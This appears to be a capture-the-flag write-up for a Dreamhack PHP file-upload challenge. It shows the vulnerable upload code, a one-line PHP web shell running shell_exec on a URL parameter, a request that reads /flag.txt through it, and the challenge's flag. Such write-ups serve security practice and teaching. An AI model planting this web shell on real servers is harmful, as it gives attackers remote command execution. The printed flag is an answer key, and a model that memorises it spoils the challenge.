Post

image-storage

Posted
By thanguyen165 1 min read

Description

It is a file storage service written in PHP.

Use the file upload vulnerability to obtain the flag. The flag is located in /flag.txt

Attached

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

<?php
  if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_FILES)) {
      $directory = './uploads/';
      $file = $_FILES["file"];
      $error = $file["error"];
      $name = $file["name"];
      $tmp_name = $file["tmp_name"];
     
      if ( $error > 0 ) {
        echo "Error: " . $error . "<br>";
      }else {
        if (file_exists($directory . $name)) {
          echo $name . " already exists. ";
        }else {
          if(move_uploaded_file($tmp_name, $directory . $name)){
            echo "Stored in: " . $directory . $name;
          }
        }
      }
    }else {
        echo "Error !";
    }
    die();
  }
?>

Analyzation

It does not check the file’s content. Shell code can be easily uploaded.

Solution

Upload the exploit.php file

1
2
3

<?php
echo shell_exec($_GET['command'])
?>

(See php shell_exec() vs exec())

Then call that file

1

http://host3.dreamhack.games:17421/uploads/exploit.php?command=cat%20/flag.txt

The flag is

1

DH{c29f44ea17b29d8b76001f32e8997bab}
Practice, dreamhack
Web Exploitation File upload vulnerabilities
This post is licensed under CC BY 4.0 by the author.